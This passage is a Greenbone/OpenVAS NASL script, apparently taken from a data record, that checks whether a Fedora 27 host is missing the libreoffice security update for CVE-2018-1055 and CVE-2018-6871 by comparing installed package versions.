gb_fedora_2018_3eb4d8e4c4_libreoffice_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libreoffice FEDORA-2018-3eb4d8e4c4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874116\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-02-15 08:49:35 +0100 (Thu, 15 Feb 2018)\");\n script_cve_id(\"CVE-2018-1055\", \"CVE-2018-6871\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libreoffice FEDORA-2018-3eb4d8e4c4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libreoffice'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libreoffice on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-3eb4d8e4c4\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/37OVCY6ZY7TPPIXSIWYZ3TSTGX7QMYIZ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"libreoffice\", rpm:\"libreoffice~5.4.5.1~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}